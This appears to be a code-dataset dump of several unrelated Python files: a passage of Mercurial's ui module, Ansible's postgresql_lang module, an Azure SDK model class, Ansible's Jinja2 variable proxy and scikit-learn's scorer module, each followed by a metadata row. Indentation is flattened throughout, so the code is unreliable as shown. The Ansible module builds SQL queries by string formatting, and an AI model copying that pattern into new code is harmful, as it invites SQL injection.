'''write status message to output (if ui.quiet is False)
This adds an output label of "ui.status".
'''
if not self.quiet:
opts['label'] = opts.get('label', '') + ' ui.status'
self.write(*msg, **opts)
def warn(self, *msg, **opts):
'''write warning message to output (stderr)
This adds an output label of "ui.warning".
'''
opts['label'] = opts.get('label', '') + ' ui.warning'
self.write_err(*msg, **opts)
def note(self, *msg, **opts):
'''write note to output (if ui.verbose is True)
This adds an output label of "ui.note".
'''
if self.verbose:
opts['label'] = opts.get('label', '') + ' ui.note'
self.write(*msg, **opts)
def debug(self, *msg, **opts):
'''write debug message to output (if ui.debugflag is True)
This adds an output label of "ui.debug".
'''
if self.debugflag:
opts['label'] = opts.get('label', '') + ' ui.debug'
self.write(*msg, **opts)
def edit(self, text, user, extra=None, editform=None, pending=None):
extra_defaults = { 'prefix': 'editor' }
if extra is not None:
extra_defaults.update(extra)
extra = extra_defaults
(fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
suffix=".txt", text=True)
try:
f = os.fdopen(fd, "w")
f.write(text)
f.close()
environ = {'HGUSER': user}
if 'transplant_source' in extra:
environ.update({'HGREVISION': hex(extra['transplant_source'])})
for label in ('intermediate-source', 'source', 'rebase_source'):
if label in extra:
environ.update({'HGREVISION': extra[label]})
break
if editform:
environ.update({'HGEDITFORM': editform})
if pending:
environ.update({'HG_PENDING': pending})
editor = self.geteditor()
self.system("%s \"%s\"" % (editor, name),
environ=environ,
onerr=error.Abort, errprefix=_("edit failed"))
f = open(name)
t = f.read()
f.close()
finally:
os.unlink(name)
return t
def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None):
'''execute shell command with appropriate output stream. command
output will be redirected if fout is not stdout.
'''
out = self.fout
if any(s[1] for s in self._bufferstates):
out = self
return util.system(cmd, environ=environ, cwd=cwd, onerr=onerr,
errprefix=errprefix, out=out)
def traceback(self, exc=None, force=False):
'''print exception traceback if traceback printing enabled or forced.
only to call in exception handler. returns true if traceback
printed.'''
if self.tracebackflag or force:
if exc is None:
exc = sys.exc_info()
cause = getattr(exc[1], 'cause', None)
if cause is not None:
causetb = traceback.format_tb(cause[2])
exctb = traceback.format_tb(exc[2])
exconly = traceback.format_exception_only(cause[0], cause[1])
# exclude frame where 'exc' was chained and rethrown from exctb
self.write_err('Traceback (most recent call last):\n',
''.join(exctb[:-1]),
''.join(causetb),
''.join(exconly))
else:
output = traceback.format_exception(exc[0], exc[1], exc[2])
self.write_err(''.join(output))
return self.tracebackflag or force
def geteditor(self):
'''return editor to use'''
if sys.platform == 'plan9':
# vi is the MIPS instruction simulator on Plan 9. We
# instead default to E to plumb commit messages to
# avoid confusion.
editor = 'E'
else:
editor = 'vi'
return (os.environ.get("HGEDITOR") or
self.config("ui", "editor") or
os.environ.get("VISUAL") or
os.environ.get("EDITOR", editor))
@util.propertycache
def _progbar(self):
"""setup the progbar singleton to the ui object"""
if (self.quiet or self.debugflag
or self.configbool('progress', 'disable', False)
or not progress.shouldprint(self)):
return None
return getprogbar(self)
def _progclear(self):
"""clear progress bar output if any. use it before any output"""
if '_progbar' not in vars(self): # nothing loaded yet
return
if self._progbar is not None and self._progbar.printed:
self._progbar.clear()
def progress(self, topic, pos, item="", unit="", total=None):
'''show a progress message
With stock hg, this is simply a debug message that is hidden
by default, but with extensions or GUI tools it may be
visible. 'topic' is the current operation, 'item' is a
non-numeric marker of the current position (i.e. the currently
in-process file), 'pos' is the current numeric position (i.e.
revision, bytes, etc.), unit is a corresponding unit label,
and total is the highest expected pos.
Multiple nested topics may be active at a time.
All topics should be marked closed by setting pos to None at
termination.
'''
if self._progbar is not None:
self._progbar.progress(topic, pos, item=item, unit=unit,
total=total)
if pos is None or not self.configbool('progress', 'debug'):
return
if unit:
unit = ' ' + unit
if item:
item = ' ' + item
if total:
pct = 100.0 * pos / total
self.debug('%s:%s %s/%s%s (%4.2f%%)\n'
% (topic, item, pos, total, unit, pct))
else:
self.debug('%s:%s %s%s\n' % (topic, item, pos, unit))
def log(self, service, *msg, **opts):
'''hook for logging facility extensions
service should be a readily-identifiable subsystem, which will
allow filtering.
*msg should be a newline-terminated format string to log, and
then any values to %-format into that format string.
**opts currently has no defined meanings.
'''
def label(self, msg, label):
'''style msg based on supplied label
Like ui.write(), this just returns msg unchanged, but extensions
and GUI tools can override it to allow styling output without
writing it.
ui.write(s, 'label') is equivalent to
ui.write(ui.label(s, 'label')).
'''
return msg
def develwarn(self, msg, stacklevel=1):
"""issue a developer warning message
Use 'stacklevel' to report the offender some layers further up in the
stack.
"""
msg = 'devel-warn: ' + msg
stacklevel += 1 # get in develwarn
if self.tracebackflag:
util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
else:
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
self.write_err('%s at: %s:%s (%s)\n'
% ((msg,) + calframe[stacklevel][1:4]))
def deprecwarn(self, msg, version):
"""issue a deprecation warning
- msg: message explaining what is deprecated and how to upgrade,
- version: last version where the API will be supported,
"""
msg += ("\n(compatibility will be dropped after Mercurial-%s,"
" update your code.)") % version
self.develwarn(msg, stacklevel=2)
class paths(dict):
"""Represents a collection of paths and their configs.
Data is initially derived from ui instances and the config files they have
loaded.
"""
def __init__(self, ui):
dict.__init__(self)
for name, loc in ui.configitems('paths', ignoresub=True):
# No location is the same as not existing.
if not loc:
continue
loc, sub = ui.configsuboptions('paths', name)
self[name] = path(ui, name, rawloc=loc, suboptions=sub)
def getpath(self, name, default=None):
"""Return a ``path`` from a string, falling back to default.
``name`` can be a named path or locations. Locations are filesystem
paths or URIs.
Returns None if ``name`` is not a registered path, a URI, or a local
path to a repo.
"""
# Only fall back to default if no path was requested.
if name is None:
if not default:
default = ()
elif not isinstance(default, (tuple, list)):
default = (default,)
for k in default:
try:
return self[k]
except KeyError:
continue
return None
# Most likely empty string.
# This may need to raise in the future.
if not name:
return None
try:
return self[name]
except KeyError:
# Try to resolve as a local path or URI.
try:
# We don't pass sub-options in, so no need to pass ui instance.
return path(None, None, rawloc=name)
except ValueError:
raise error.RepoError(_('repository %s does not exist') %
name)
_pathsuboptions = {}
def pathsuboption(option, attr):
"""Decorator used to declare a path sub-option.
Arguments are the sub-option name and the attribute it should set on
``path`` instances.
The decorated function will receive as arguments a ``ui`` instance,
``path`` instance, and the string value of this option from the config.
The function should return the value that will be set on the ``path``
instance.
This decorator can be used to perform additional verification of
sub-options and to change the type of sub-options.
"""
def register(func):
_pathsuboptions[option] = (attr, func)
return func
return register
@pathsuboption('pushurl', 'pushloc')
def pushurlpathoption(ui, path, value):
u = util.url(value)
# Actually require a URL.
if not u.scheme:
ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
return None
# Don't support the #foo syntax in the push URL to declare branch to
# push.
if u.fragment:
ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
'ignoring)\n') % path.name)
u.fragment = None
return str(u)
class path(object):
"""Represents an individual path and its configuration."""
def __init__(self, ui, name, rawloc=None, suboptions=None):
"""Construct a path from its config options.
``ui`` is the ``ui`` instance the path is coming from.
``name`` is the symbolic name of the path.
``rawloc`` is the raw location, as defined in the config.
``pushloc`` is the raw locations pushes should be made to.
If ``name`` is not defined, we require that the location be a) a local
filesystem path with a .hg directory or b) a URL. If not,
``ValueError`` is raised.
"""
if not rawloc:
raise ValueError('rawloc must be defined')
# Locations may define branches via syntax <base>#<branch>.
u = util.url(rawloc)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
self.url = u
self.branch = branch
self.name = name
self.rawloc = rawloc
self.loc = str(u)
# When given a raw location but not a symbolic name, validate the
# location is valid.
if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
raise ValueError('location is not a URL or path to a local '
'repo: %s' % rawloc)
suboptions = suboptions or {}
# Now process the sub-options. If a sub-option is registered, its
# attribute will always be present. The value will be None if there
# was no valid sub-option.
for suboption, (attr, func) in _pathsuboptions.iteritems():
if suboption not in suboptions:
setattr(self, attr, None)
continue
value = func(ui, self, suboptions[suboption])
setattr(self, attr, value)
def _isvalidlocalpath(self, path):
"""Returns True if the given path is a potentially valid repository.
This is its own function so that extensions can change the definition of
'valid' in this case (like when pulling from a git repo into a hg
one)."""
return os.path.isdir(os.path.join(path, '.hg'))
@property
def suboptions(self):
"""Return sub-options and their values for this path.
This is intended to be used for presentation purposes.
"""
d = {}
for subopt, (attr, _func) in _pathsuboptions.iteritems():
value = getattr(self, attr)
if value is not None:
d[subopt] = value
return d
# we instantiate one globally shared progress bar to avoid
# competing progress bars when multiple UI objects get created
_progresssingleton = None
def getprogbar(ui):
global _progresssingleton
if _progresssingleton is None:
# passing 'ui' object to the singleton is fishy,
# this is how the extension used to work but feel free to rework it.
_progresssingleton = progress.progbar(ui)
return _progresssingleton
| gpl-2.0 | 2,602,354,919,809,655,300 | -5,017,552,082,869,698,000 | 35.209026 | 80 | 0.551233 | false |
valentin-krasontovitsch/ansible | lib/ansible/modules/database/postgresql/postgresql_lang.py | 1 | 11522 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2014, Jens Depuydt <http://www.jensd.be>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: postgresql_lang
short_description: Adds, removes or changes procedural languages with a PostgreSQL database.
description:
- Adds, removes or changes procedural languages with a PostgreSQL database.
    - This module allows you to add a language, remove a language or change the trust
      relationship with a PostgreSQL database. The module can be used on the machine
      where it is executed or on a remote host.
- When removing a language from a database, it is possible that dependencies prevent
      the language from being removed. In that case, you can specify cascade to
automatically drop objects that depend on the language (such as functions in the
language). In case the language can't be deleted because it is required by the
database system, you can specify fail_on_drop=no to ignore the error.
    - Be careful when marking a language as trusted since this could be a potential
security breach. Untrusted languages allow only users with the PostgreSQL superuser
privilege to use this language to create new functions.
version_added: "1.7"
options:
lang:
description:
- name of the procedural language to add, remove or change
required: true
trust:
description:
- make this language trusted for the selected db
type: bool
default: 'no'
db:
description:
- name of database where the language will be added, removed or changed
force_trust:
description:
- marks the language as trusted, even if it's marked as untrusted in pg_pltemplate.
- use with care!
type: bool
default: 'no'
fail_on_drop:
description:
- if C(yes), fail when removing a language. Otherwise just log and continue
- in some cases, it is not possible to remove a language (used by the db-system). When dependencies block the removal, consider using C(cascade).
type: bool
default: 'yes'
cascade:
description:
- when dropping a language, also delete object that depend on this language.
- only used when C(state=absent).
type: bool
default: 'no'
port:
description:
- Database port to connect to.
default: 5432
login_user:
description:
- User used to authenticate with PostgreSQL
default: postgres
login_password:
description:
- Password used to authenticate with PostgreSQL (must match C(login_user))
login_host:
description:
- Host running PostgreSQL where you want to execute the actions.
default: localhost
state:
description:
- The state of the language for the selected database
default: present
choices: [ "present", "absent" ]
login_unix_socket:
description:
- Path to a Unix domain socket for local connections.
version_added: '2.8'
ssl_mode:
description:
- Determines whether or with what priority a secure SSL TCP/IP connection
will be negotiated with the server.
- See U(https://www.postgresql.org/docs/current/static/libpq-ssl.html) for
more information on the modes.
- Default of C(prefer) matches libpq default.
default: prefer
choices: ["disable", "allow", "prefer", "require", "verify-ca", "verify-full"]
version_added: '2.8'
ssl_rootcert:
description:
- Specifies the name of a file containing SSL certificate authority (CA)
certificate(s). If the file exists, the server's certificate will be
verified to be signed by one of these authorities.
version_added: '2.8'
notes:
- The default authentication assumes that you are either logging in as or
sudo'ing to the postgres account on the host.
- This module uses psycopg2, a Python PostgreSQL database adapter. You must
ensure that psycopg2 is installed on the host before using this module. If
the remote host is the PostgreSQL server (which is the default case), then
PostgreSQL must also be installed on the remote host. For Ubuntu-based
systems, install the postgresql, libpq-dev, and python-psycopg2 packages
on the remote host before using this module.
requirements: [ psycopg2 ]
author:
- "Jens Depuydt (@jensdepuydt)"
- "Thomas O'Donnell (@andytom)"
'''
EXAMPLES = '''
# Add language pltclu to database testdb if it doesn't exist:
- postgresql_lang db=testdb lang=pltclu state=present
# Add language pltclu to database testdb if it doesn't exist and mark it as trusted:
# Marks the language as trusted if it exists but isn't trusted yet
# force_trust makes sure that the language will be marked as trusted
- postgresql_lang:
db: testdb
lang: pltclu
state: present
trust: yes
force_trust: yes
# Remove language pltclu from database testdb:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
# Remove language pltclu from database testdb and remove all dependencies:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
cascade: yes
# Remove language pltclu from database testdb but ignore errors if something prevents the removal:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
fail_on_drop: no
'''
import traceback
try:
import psycopg2
except ImportError:
postgresqldb_found = False
else:
postgresqldb_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
def lang_exists(cursor, lang):
"""Checks if language exists for db"""
query = "SELECT lanname FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.rowcount > 0
def lang_istrusted(cursor, lang):
"""Checks if language is trusted for db"""
query = "SELECT lanpltrusted FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.fetchone()[0]
def lang_altertrust(cursor, lang, trust):
"""Changes if language is trusted for db"""
query = "UPDATE pg_language SET lanpltrusted = %s WHERE lanname=%s"
cursor.execute(query, (trust, lang))
return True
def lang_add(cursor, lang, trust):
"""Adds language for db"""
if trust:
query = 'CREATE TRUSTED LANGUAGE "%s"' % lang
else:
query = 'CREATE LANGUAGE "%s"' % lang
cursor.execute(query)
return True
def lang_drop(cursor, lang, cascade):
"""Drops language for db"""
cursor.execute("SAVEPOINT ansible_pgsql_lang_drop")
try:
if cascade:
cursor.execute("DROP LANGUAGE \"%s\" CASCADE" % lang)
else:
cursor.execute("DROP LANGUAGE \"%s\"" % lang)
except Exception:
cursor.execute("ROLLBACK TO SAVEPOINT ansible_pgsql_lang_drop")
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return False
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return True
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default="postgres"),
login_password=dict(default="", no_log=True),
login_host=dict(default=""),
login_unix_socket=dict(default=""),
db=dict(required=True),
port=dict(default='5432'),
lang=dict(required=True),
state=dict(default="present", choices=["absent", "present"]),
trust=dict(type='bool', default='no'),
force_trust=dict(type='bool', default='no'),
cascade=dict(type='bool', default='no'),
fail_on_drop=dict(type='bool', default='yes'),
ssl_mode=dict(default='prefer', choices=[
'disable', 'allow', 'prefer', 'require', 'verify-ca', 'verify-full']),
ssl_rootcert=dict(default=None),
),
supports_check_mode=True
)
db = module.params["db"]
lang = module.params["lang"]
state = module.params["state"]
trust = module.params["trust"]
force_trust = module.params["force_trust"]
cascade = module.params["cascade"]
fail_on_drop = module.params["fail_on_drop"]
sslrootcert = module.params["ssl_rootcert"]
if not postgresqldb_found:
module.fail_json(msg="the python psycopg2 module is required")
# To use defaults values, keyword arguments must be absent, so
# check which values are empty and don't include in the **kw
# dictionary
params_map = {
"login_host": "host",
"login_user": "user",
"login_password": "password",
"port": "port",
"db": "database",
"ssl_mode": "sslmode",
"ssl_rootcert": "sslrootcert"
}
kw = dict((params_map[k], v) for (k, v) in iteritems(module.params)
if k in params_map and v != "" and v is not None)
# If a login_unix_socket is specified, incorporate it here.
is_localhost = "host" not in kw or kw["host"] == "" or kw["host"] == "localhost"
if is_localhost and module.params["login_unix_socket"] != "":
kw["host"] = module.params["login_unix_socket"]
if psycopg2.__version__ < '2.4.3' and sslrootcert is not None:
module.fail_json(msg='psycopg2 must be at least 2.4.3 in order to user the ssl_rootcert parameter')
try:
db_connection = psycopg2.connect(**kw)
cursor = db_connection.cursor()
except TypeError as e:
if 'sslrootcert' in e.args[0]:
module.fail_json(msg='Postgresql server must be at least version 8.4 to support sslrootcert')
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
changed = False
kw = {'db': db, 'lang': lang, 'trust': trust}
if state == "present":
if lang_exists(cursor, lang):
lang_trusted = lang_istrusted(cursor, lang)
if (lang_trusted and not trust) or (not lang_trusted and trust):
if module.check_mode:
changed = True
else:
changed = lang_altertrust(cursor, lang, trust)
else:
if module.check_mode:
changed = True
else:
changed = lang_add(cursor, lang, trust)
if force_trust:
changed = lang_altertrust(cursor, lang, trust)
else:
if lang_exists(cursor, lang):
if module.check_mode:
changed = True
kw['lang_dropped'] = True
else:
changed = lang_drop(cursor, lang, cascade)
if fail_on_drop and not changed:
msg = "unable to drop language, use cascade to delete dependencies or fail_on_drop=no to ignore"
module.fail_json(msg=msg)
kw['lang_dropped'] = changed
if changed:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
kw['changed'] = changed
module.exit_json(**kw)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,644,778,302,881,439,000 | -2,813,020,548,860,137,500 | 34.343558 | 159 | 0.644506 | false |
Azure/azure-sdk-for-python | sdk/applicationinsights/azure-applicationinsights/azure/applicationinsights/models/events_user_info_py3.py | 1 | 1277 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EventsUserInfo(Model):
"""User info for an event result.
:param id: ID of the user
:type id: str
:param account_id: Account ID of the user
:type account_id: str
:param authenticated_id: Authenticated ID of the user
:type authenticated_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'account_id': {'key': 'accountId', 'type': 'str'},
'authenticated_id': {'key': 'authenticatedId', 'type': 'str'},
}
def __init__(self, *, id: str=None, account_id: str=None, authenticated_id: str=None, **kwargs) -> None:
super(EventsUserInfo, self).__init__(**kwargs)
self.id = id
self.account_id = account_id
self.authenticated_id = authenticated_id
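    # Example construction, with illustrative values only (not part of the
    # original generated code):
    #   EventsUserInfo(id='user-1', account_id='acct-1', authenticated_id='auth-1')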
| mit | -8,814,970,097,250,905,000 | -5,095,124,076,021,987,000 | 34.472222 | 108 | 0.570086 | false |
ptisserand/ansible | lib/ansible/template/vars.py | 39 | 4935 | # (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from collections import Mapping
from jinja2.utils import missing
from ansible.errors import AnsibleError, AnsibleUndefinedVariable
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
__all__ = ['AnsibleJ2Vars']
class AnsibleJ2Vars(Mapping):
'''
Helper class to template all variable content before jinja2 sees it. This is
done by hijacking the variable storage that jinja2 uses, and overriding __contains__
and __getitem__ to look like a dict. Added bonus is avoiding duplicating the large
hashes that inject tends to be.
To facilitate using builtin jinja2 things like range, globals are also handled here.
'''
def __init__(self, templar, globals, locals=None, *extras):
'''
Initializes this object with a valid Templar() object, as
well as several dictionaries of variables representing
different scopes (in jinja2 terminology).
'''
self._templar = templar
self._globals = globals
self._extras = extras
self._locals = dict()
if isinstance(locals, dict):
for key, val in iteritems(locals):
if val is not missing:
if key[:2] == 'l_':
self._locals[key[2:]] = val
elif key not in ('context', 'environment', 'template'):
self._locals[key] = val
def __contains__(self, k):
if k in self._templar._available_variables:
return True
if k in self._locals:
return True
for i in self._extras:
if k in i:
return True
if k in self._globals:
return True
return False
def __iter__(self):
keys = set()
keys.update(self._templar._available_variables, self._locals, self._globals, *self._extras)
return iter(keys)
def __len__(self):
keys = set()
keys.update(self._templar._available_variables, self._locals, self._globals, *self._extras)
return len(keys)
def __getitem__(self, varname):
if varname not in self._templar._available_variables:
if varname in self._locals:
return self._locals[varname]
for i in self._extras:
if varname in i:
return i[varname]
if varname in self._globals:
return self._globals[varname]
else:
raise KeyError("undefined variable: %s" % varname)
variable = self._templar._available_variables[varname]
# HostVars is special, return it as-is, as is the special variable
# 'vars', which contains the vars structure
from ansible.vars.hostvars import HostVars
if isinstance(variable, dict) and varname == "vars" or isinstance(variable, HostVars) or hasattr(variable, '__UNSAFE__'):
return variable
else:
value = None
try:
value = self._templar.template(variable)
except AnsibleUndefinedVariable:
raise
except Exception as e:
                msg = getattr(e, 'message', None) or to_native(e)
raise AnsibleError("An unhandled exception occurred while templating '%s'. "
"Error was a %s, original message: %s" % (to_native(variable), type(e), msg))
return value
def add_locals(self, locals):
'''
If locals are provided, create a copy of self containing those
locals in addition to what is already in this variable proxy.
'''
if locals is None:
return self
# FIXME run this only on jinja2>=2.9?
# prior to version 2.9, locals contained all of the vars and not just the current
# local vars so this was not necessary for locals to propagate down to nested includes
new_locals = self._locals.copy()
new_locals.update(locals)
return AnsibleJ2Vars(self._templar, self._globals, locals=new_locals, *self._extras)
| gpl-3.0 | -1,024,561,830,722,893,800 | 801,419,993,277,123,600 | 36.671756 | 129 | 0.619656 | false |
samuel1208/scikit-learn | sklearn/metrics/scorer.py | 211 | 13141 | """
The :mod:`sklearn.metrics.scorer` submodule implements a flexible
interface for model selection and evaluation using
arbitrary score functions.
A scorer object is a callable that can be passed to
:class:`sklearn.grid_search.GridSearchCV` or
:func:`sklearn.cross_validation.cross_val_score` as the ``scoring`` parameter,
to specify how a model should be evaluated.
The signature of the call is ``(estimator, X, y)`` where ``estimator``
is the model to be evaluated, ``X`` is the test data and ``y`` is the
ground truth labeling (or ``None`` in the case of unsupervised models).
"""
# Authors: Andreas Mueller <[email protected]>
# Lars Buitinck <[email protected]>
# Arnaud Joly <[email protected]>
# License: Simplified BSD
from abc import ABCMeta, abstractmethod
from functools import partial
import numpy as np
from . import (r2_score, median_absolute_error, mean_absolute_error,
mean_squared_error, accuracy_score, f1_score,
roc_auc_score, average_precision_score,
precision_score, recall_score, log_loss)
from .cluster import adjusted_rand_score
from ..utils.multiclass import type_of_target
from ..externals import six
from ..base import is_regressor
class _BaseScorer(six.with_metaclass(ABCMeta, object)):
def __init__(self, score_func, sign, kwargs):
self._kwargs = kwargs
self._score_func = score_func
self._sign = sign
@abstractmethod
def __call__(self, estimator, X, y, sample_weight=None):
pass
def __repr__(self):
kwargs_string = "".join([", %s=%s" % (str(k), str(v))
for k, v in self._kwargs.items()])
return ("make_scorer(%s%s%s%s)"
% (self._score_func.__name__,
"" if self._sign > 0 else ", greater_is_better=False",
self._factory_args(), kwargs_string))
def _factory_args(self):
"""Return non-default make_scorer arguments for repr."""
return ""
class _PredictScorer(_BaseScorer):
def __call__(self, estimator, X, y_true, sample_weight=None):
"""Evaluate predicted target values for X relative to y_true.
Parameters
----------
estimator : object
            Trained estimator to use for scoring. Must have a predict
            method; the output of that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to estimator.predict.
y_true : array-like
Gold standard target values for X.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
y_pred = estimator.predict(X)
if sample_weight is not None:
return self._sign * self._score_func(y_true, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y_true, y_pred,
**self._kwargs)
class _ProbaScorer(_BaseScorer):
def __call__(self, clf, X, y, sample_weight=None):
"""Evaluate predicted probabilities for X relative to y_true.
Parameters
----------
clf : object
Trained classifier to use for scoring. Must have a predict_proba
method; the output of that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to clf.predict_proba.
y : array-like
Gold standard target values for X. These must be class labels,
not probabilities.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
y_pred = clf.predict_proba(X)
if sample_weight is not None:
return self._sign * self._score_func(y, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y, y_pred, **self._kwargs)
def _factory_args(self):
return ", needs_proba=True"
class _ThresholdScorer(_BaseScorer):
def __call__(self, clf, X, y, sample_weight=None):
"""Evaluate decision function output for X relative to y_true.
Parameters
----------
clf : object
Trained classifier to use for scoring. Must have either a
decision_function method or a predict_proba method; the output of
that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to clf.decision_function or
clf.predict_proba.
y : array-like
Gold standard target values for X. These must be class labels,
not decision function values.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
y_type = type_of_target(y)
if y_type not in ("binary", "multilabel-indicator"):
raise ValueError("{0} format is not supported".format(y_type))
if is_regressor(clf):
y_pred = clf.predict(X)
else:
try:
y_pred = clf.decision_function(X)
# For multi-output multi-class estimator
if isinstance(y_pred, list):
y_pred = np.vstack(p for p in y_pred).T
except (NotImplementedError, AttributeError):
y_pred = clf.predict_proba(X)
if y_type == "binary":
y_pred = y_pred[:, 1]
elif isinstance(y_pred, list):
y_pred = np.vstack([p[:, -1] for p in y_pred]).T
if sample_weight is not None:
return self._sign * self._score_func(y, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y, y_pred, **self._kwargs)
def _factory_args(self):
return ", needs_threshold=True"
def get_scorer(scoring):
if isinstance(scoring, six.string_types):
try:
scorer = SCORERS[scoring]
except KeyError:
raise ValueError('%r is not a valid scoring value. '
'Valid options are %s'
% (scoring, sorted(SCORERS.keys())))
else:
scorer = scoring
return scorer
def _passthrough_scorer(estimator, *args, **kwargs):
"""Function that wraps estimator.score"""
return estimator.score(*args, **kwargs)
def check_scoring(estimator, scoring=None, allow_none=False):
"""Determine scorer from user options.
A TypeError will be thrown if the estimator cannot be scored.
Parameters
----------
estimator : estimator object implementing 'fit'
The object to use to fit the data.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
allow_none : boolean, optional, default: False
If no scoring is specified and the estimator has no score function, we
can either return None or raise an exception.
Returns
-------
scoring : callable
A scorer callable object / function with signature
``scorer(estimator, X, y)``.
"""
has_scoring = scoring is not None
if not hasattr(estimator, 'fit'):
raise TypeError("estimator should a be an estimator implementing "
"'fit' method, %r was passed" % estimator)
elif has_scoring:
return get_scorer(scoring)
elif hasattr(estimator, 'score'):
return _passthrough_scorer
elif allow_none:
return None
else:
raise TypeError(
"If no scoring is specified, the estimator passed should "
"have a 'score' method. The estimator %r does not." % estimator)
def make_scorer(score_func, greater_is_better=True, needs_proba=False,
needs_threshold=False, **kwargs):
"""Make a scorer from a performance metric or loss function.
This factory function wraps scoring functions for use in GridSearchCV
and cross_val_score. It takes a score function, such as ``accuracy_score``,
``mean_squared_error``, ``adjusted_rand_index`` or ``average_precision``
and returns a callable that scores an estimator's output.
Read more in the :ref:`User Guide <scoring>`.
Parameters
----------
score_func : callable,
Score function (or loss function) with signature
``score_func(y, y_pred, **kwargs)``.
greater_is_better : boolean, default=True
Whether score_func is a score function (default), meaning high is good,
or a loss function, meaning low is good. In the latter case, the
scorer object will sign-flip the outcome of the score_func.
needs_proba : boolean, default=False
Whether score_func requires predict_proba to get probability estimates
out of a classifier.
needs_threshold : boolean, default=False
Whether score_func takes a continuous decision certainty.
This only works for binary classification using estimators that
have either a decision_function or predict_proba method.
For example ``average_precision`` or the area under the roc curve
can not be computed using discrete predictions alone.
**kwargs : additional arguments
Additional parameters to be passed to score_func.
Returns
-------
scorer : callable
Callable object that returns a scalar score; greater is better.
Examples
--------
>>> from sklearn.metrics import fbeta_score, make_scorer
>>> ftwo_scorer = make_scorer(fbeta_score, beta=2)
>>> ftwo_scorer
make_scorer(fbeta_score, beta=2)
>>> from sklearn.grid_search import GridSearchCV
>>> from sklearn.svm import LinearSVC
>>> grid = GridSearchCV(LinearSVC(), param_grid={'C': [1, 10]},
... scoring=ftwo_scorer)
"""
sign = 1 if greater_is_better else -1
if needs_proba and needs_threshold:
raise ValueError("Set either needs_proba or needs_threshold to True,"
" but not both.")
if needs_proba:
cls = _ProbaScorer
elif needs_threshold:
cls = _ThresholdScorer
else:
cls = _PredictScorer
return cls(score_func, sign, kwargs)
# Standard regression scores
r2_scorer = make_scorer(r2_score)
mean_squared_error_scorer = make_scorer(mean_squared_error,
greater_is_better=False)
mean_absolute_error_scorer = make_scorer(mean_absolute_error,
greater_is_better=False)
median_absolute_error_scorer = make_scorer(median_absolute_error,
greater_is_better=False)
# Standard Classification Scores
accuracy_scorer = make_scorer(accuracy_score)
f1_scorer = make_scorer(f1_score)
# Score functions that need decision values
roc_auc_scorer = make_scorer(roc_auc_score, greater_is_better=True,
needs_threshold=True)
average_precision_scorer = make_scorer(average_precision_score,
needs_threshold=True)
precision_scorer = make_scorer(precision_score)
recall_scorer = make_scorer(recall_score)
# Score function for probabilistic classification
log_loss_scorer = make_scorer(log_loss, greater_is_better=False,
needs_proba=True)
# Clustering scores
adjusted_rand_scorer = make_scorer(adjusted_rand_score)
SCORERS = dict(r2=r2_scorer,
median_absolute_error=median_absolute_error_scorer,
mean_absolute_error=mean_absolute_error_scorer,
mean_squared_error=mean_squared_error_scorer,
accuracy=accuracy_scorer, roc_auc=roc_auc_scorer,
average_precision=average_precision_scorer,
log_loss=log_loss_scorer,
adjusted_rand_score=adjusted_rand_scorer)
